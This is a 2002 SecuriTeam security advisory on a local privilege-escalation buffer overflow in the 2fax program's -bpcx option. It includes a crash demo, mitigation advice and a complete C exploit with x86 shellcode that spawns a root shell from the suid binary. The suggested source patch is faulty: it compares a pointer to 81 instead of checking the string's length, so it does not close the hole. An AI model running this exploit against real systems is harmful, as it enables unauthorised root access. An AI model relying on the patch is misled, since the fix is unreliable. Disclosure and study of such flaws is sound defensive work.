[EXPL] 2fax Local Exploit Code Released (-bpcx)

From: support@securiteam.com
Date: 07/13/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 13 Jul 2002 00:20:22 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  2fax Local Exploit Code Released (-bpcx)
------------------------------------------------------------------------

SUMMARY

 <http://www.atbas.org/2fax/index.php> 2fax is a command line program
which converts ASCII files into fax (tiff) formatted files. It works with
Hylafax (Linux) and bgfax (DOS/Windows). It also uses PCX files for logos
and signatures, which can be overlaid over the ASCII text. The program has
been found to contain a security vulnerability that would allow a local
attacker to gain elevated privileges.

DETAILS

Vulnerable systems:
 * 2fax version 2.02 and prior

Example:
When you execute 2fax program with -bpcx option putting in this option
many symbols ( >212 ) program will make it SEGFAULT:

[root@ns 2fax-2.02]# ./2fax -bpcx:`perl -e 'print "A"x666'` aaa aaa
Segmentation fault (core dumped)
[root@ns 2fax-2.02]# gdb 2fax core
..
#0 0x41414141 in ?? ()
(gdb)
..

Therefore, we can execute arbitrary code with uid/gid of author of this
program if this program has been set with suid bits.

Temporary solution:
1) Clear suid bit from program:
# chmod ug-s /path/to/2fax

2) Edit source of 2fax program:
..
char page_pcxfn[81]=""; /* page pcx file */
..
word setswitches(char *sw, word cmdline, word def)
{
..
case 17 :
  if(&sw[l]<=81) { // make this check on length
     strcpy(page_pcxfn,&sw[l]);
     if (cmdline==0) page_pcxno=Openpcx(1,page_pcxfn); /*1.91*/
  }
  else printf("Error: Length of pcx file is too big (max 81)\n");
  break;
..

Exploit code:
/*******************************************************************************
 * *
 * 2fax local PoC exploit *
 * by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte
[lbyte.void.ru] *
 * *
 * Bug: Buffer Overflow in -bpcx option *
 * Homepage of 2fax: http://www.atbas.org/ *
 * *
 * Solution: Don't set suid bit to 2fax program *
 * *
 
*******************************************************************************/

#include <stdio.h>
#include <stdlib.h>

#define MAX_SIZE 350
#define OFFSET -1100
#define tmpfile "/tmp/abcde0987654"

/* shellcode for Linux x86 by Grange */

char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";

long getesp() {
__asm__("movl %esp,%eax");
}

void usage(int argc, char **argv) {
  printf("Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein
[crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n"
         "Usage: %s </path/to/2fax> [offset]\n\n",argv[0]);
  return;
}

int main(int argc,char **argv) {
  char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200];
  int offset = OFFSET;
  long ret;

  if(argc<2) { usage(argc,argv); exit(-1); }

  strcpy(faxpath,argv[1]);
  if(argv[2]) offset=atoi(argv[2]);

  bzero(buf,sizeof(buf));
  bzero(buf2,sizeof(buf2));

  ret=getesp()-offset;

  printf("ret: 0x%x, offset: %d\n",ret,offset);

  memset(buf,0x90,312-strlen(shellcode));
  strcat(buf,shellcode);

  strcat(buf,"AAAAAAAAAAAAAAAA");
  while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret;

  sprintf(buf2,"-bpcx:%s",buf);
  sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile);
  system(tmpexec);

  execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL);

  return 0;

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:crazy_einstein@yahoo.com>
Crazy Einstein.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages